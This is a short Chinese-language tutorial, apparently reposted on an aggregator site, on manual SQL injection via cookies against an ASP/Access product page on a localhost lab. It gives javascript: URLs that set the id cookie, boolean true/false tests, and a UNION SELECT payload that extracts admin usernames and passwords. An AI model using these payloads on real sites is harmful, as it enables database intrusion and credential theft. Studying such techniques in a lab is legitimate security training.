cookie手工注入

Posted 彩虹背后

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了cookie手工注入相关的知识,希望对你有一定的参考价值。

1.先访问当前注入点文件名

 

 

 

 

2.修改cookie

 

javascript:alert(document.cookie="id="+escape("1137"));

把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容

 

 

 

 

注入点:

http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?id=1137

 

注入点文件名:

http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?

 

 

javascript:alert(document.cookie="id="+escape("260"));

 

 

内容:document.cookie="id="+escape("260")

 

document.cookie //修改cookie

"id="+escape("260")

//id是咱们注入点的参数

260 //参数值

 

 

 

javascript //使用js语句

 

alert //弹出窗口,

 

 

javascript:alert(document.cookie="id="+escape("1137"));

把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容

 

判断是否存在注入

javascript:alert(document.cookie="id="+escape("1137 and 1=1"));

返回正常

 

javascript:alert(document.cookie="id="+escape("1137 and 1=221"));

返回错误

 

 

查询指定管理员

 

javascript:alert(document.cookie="id="+escape("1137 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin where id=40"));

 

以上是关于cookie手工注入的主要内容,如果未能解决你的问题,请参考以下文章

sql注入-access+asp手工注入

基础Web漏洞-SQL注入入门(手工注入篇)

sql注入一

手工注入——MySQL手工注入实战和分析

MySQL手工注入学习-1

手工注入和BurpSuite入门-web安全